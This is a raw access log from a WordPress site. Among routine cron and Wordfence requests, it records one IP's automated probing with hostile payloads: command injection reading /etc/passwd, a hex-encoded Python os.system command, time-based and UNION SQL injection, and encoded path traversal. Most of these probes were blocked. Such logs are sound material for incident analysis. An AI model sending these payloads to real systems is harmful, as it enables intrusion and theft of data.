165.232.54.158 - - [13/Jan/2026:17:46:16 +0800] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:17:49:56 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:50:11 +0800] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:50:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768297829.6745080947875976562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:50:26 +0800] "POST /cgi-bin/login.cgi HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:50:34 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:52:58 +0800] "POST /module/ HTTP/1.1" 404 10865 "https://nutritaste.com.auadmin/view:modules/load_module:users" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:17:53:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768297981.6774179935455322265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:52:58 +0800] "POST /module/ HTTP/1.1" 404 10865 "https://nutritaste.com.auadmin/view:modules/load_module:users" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:52:58 +0800] "POST /module/ HTTP/1.1" 404 10865 "https://nutritaste.com.auadmin/view:modules/load_module:users" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:17:53:24 +0800] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:17:54:04 +0800] "GET /cgi-bin/cgiServer.exx?page=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/117.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:54:11 +0800] "POST /installer/index.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/127.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:54:15 +0800] "POST /roundcube/installer/index.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
103.4.122.14 - - [13/Jan/2026:17:56:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768298165.2326169013977050781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:17:56:03 +0800] "POST /?wordfence_syncAttackData=1768298163.5644 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:56:01 +0800] "POST /context.json HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:56:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768298177.5929179191589355468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:56:14 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:56:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768298184.5460989475250244140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:56:21 +0800] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/38Btk6uniAAw7oz4PAUhnlALqus.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (SS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:17:57:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768298225.7559039592742919921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:57:02 +0800] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d7a6843644773354e455a6b546b316a576d6c715554526162476831623168744d55704f22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 10859 "https://nutritaste.com.au/webadmin/admin/service_manager_data.php" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:57:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768298229.9639840126037597656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:17:57:08 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:17:57:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768298240.4720010757446289062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:57:17 +0800] "GET /webadmin/out HTTP/1.1" 404 10862 "https://nutritaste.com.au/webadmin/admin/service_manager_data.php" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:17:57:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768298244.6146359443664550781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:57:21 +0800] "GET /wp-json/wp/v2/comments HTTP/1.1" 200 22 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:57:28 +0800] "POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/111.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:17:58:02 +0800] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:17:58:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768298307.6761679649353027343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:17:58:24 +0800] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/123.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:02:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768298524.7474050521850585937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:02:01 +0800] "GET /api/experimental/test HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/118.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:02:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768298534.3163099288940429687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:02:11 +0800] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:02:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768298544.2231130599975585937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:02:21 +0800] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:18:02:47 +0800] "POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:03:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768298594.7368741035461425781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:03:11 +0800] "GET /user/login HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:18:04:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768298683.6748778820037841796875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:04:40 +0800] "POST /mifs/.;/services/LogService HTTP/1.1" 404 10859 "https://nutritaste.com.au" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:04:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768298693.2502090930938720703125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:04:50 +0800] "POST /lib/crud/userprocess.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:05:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768298701.9386570453643798828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:04:59 +0800] "GET /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:18:05:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768298705.0100009441375732421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:05:02 +0800] "GET /wp-login.php HTTP/1.1" 200 3205 "https://nutritaste.com.au/login.php" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:18:05:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768298714.2540879249572753906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:05:11 +0800] "POST /lib/crud/userprocess.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:18:05:13 +0800] "GET /?rest_route=/wp/v2/pages&per_page=100 HTTP/1.1" 200 12103 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:09:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768298997.6501879692077636718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:09:54 +0800] "POST /run HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:18:10:44 +0800] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
165.232.54.158 - - [13/Jan/2026:18:10:51 +0800] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 403 6627 "https://nutritaste.com.au" "Mozilla/5.0 (SS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [13/Jan/2026:18:10:51 +0800] "GET /fuel/login/ HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
103.4.122.14 - - [13/Jan/2026:18:10:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768299055.1176519393920898437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:18:10:53 +0800] "POST /?wordfence_syncAttackData=1768299053.5979 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:10:51 +0800] "POST /fuel/login/ HTTP/1.1" 404 10863 "https://nutritaste.com.au" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/116.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:10:53 +0800] "POST /?wordfence_syncAttackData=1768299053.5969 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:18:11:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768299080.5398991107940673828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:11:17 +0800] "GET /user/login HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
165.232.54.158 - - [13/Jan/2026:18:12:24 +0800] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Esoir.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
103.4.122.14 - - [13/Jan/2026:18:12:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768299152.7751829624176025390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:12:29 +0800] "GET /include/soir.txt HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:18:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768299480.6560750007629394531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:17:57 +0800] "POST /cgi-bin/login.cgi HTTP/1.1" 404 10866 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:18:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768299490.2912158966064453125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:18:07 +0800] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:21:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768299684.6716070175170898437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:21:21 +0800] "GET /global-protect/login.esp HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:18:21:54 +0800] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [13/Jan/2026:18:22:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768299721.6435070037841796875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:21:58 +0800] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:18:22:44 +0800] "POST /login HTTP/1.1" 403 199 "nutritaste.com.au/module/login/login.html" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:18:23:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768299832.7070488929748535156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:23:49 +0800] "POST /hms/user-login.php HTTP/1.1" 404 10869 "-" "Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:24:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768299841.5222311019897460937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:23:58 +0800] "POST /jars/upload HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:24:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768299851.0491430759429931640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:24:08 +0800] "GET /admin/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:18:24:08 +0800] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:24:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768299859.8807389736175537109375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:24:17 +0800] "GET /admin/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (SS; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [13/Jan/2026:18:24:27 +0800] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 403 6628 "https://nutritaste.com.au" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
165.232.54.158 - - [13/Jan/2026:18:24:27 +0800] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 403 6628 "https://nutritaste.com.au" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:18:24:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768299884.6531429290771484375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:18:24:43 +0800] "POST /?wordfence_syncAttackData=1768299883.1984 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:24:41 +0800] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:18:28:26 +0800] "GET /cgi-bin/cgiServer.exx?download=/etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:18:33:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768300394.7188739776611328125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:33:11 +0800] "GET /tiki-login_scr.php HTTP/1.1" 404 10875 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [13/Jan/2026:18:33:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768300408.3191580772399902343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:33:25 +0800] "GET /tiki-login_scr.php HTTP/1.1" 404 10875 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:33:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768300424.2222559452056884765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:33:41 +0800] "GET /tiki-index.php HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:18:33:52 +0800] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:34:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768300464.5283761024475097656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:34:21 +0800] "GET /?p=1 HTTP/1.1" 404 10854 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [13/Jan/2026:18:37:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768300623.8526289463043212890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:37:00 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
68.183.24.222 - - [13/Jan/2026:18:37:01 +0800] "POST /wp-login.php HTTP/1.1" 503 7315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0"
165.232.54.158 - - [13/Jan/2026:18:37:10 +0800] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:18:38:31 +0800] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:18:39:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768300777.7181611061096191406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:39:34 +0800] "POST /var HTTP/1.1" 404 10865 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:40:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768300855.6658239364624023437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:40:52 +0800] "POST /SearchSvc/CVSearchService.svc HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:18:41:08 +0800] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:18:41:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768300911.1156311035156250000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:18:41:49 +0800] "POST /?wordfence_syncAttackData=1768300909.5891 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:41:47 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [13/Jan/2026:18:42:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768300925.5232930183410644531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:42:02 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
103.4.122.14 - - [13/Jan/2026:18:42:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768300930.3225159645080566406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:42:07 +0800] "GET /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:18:43:53 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:44:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768301044.7506670951843261718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
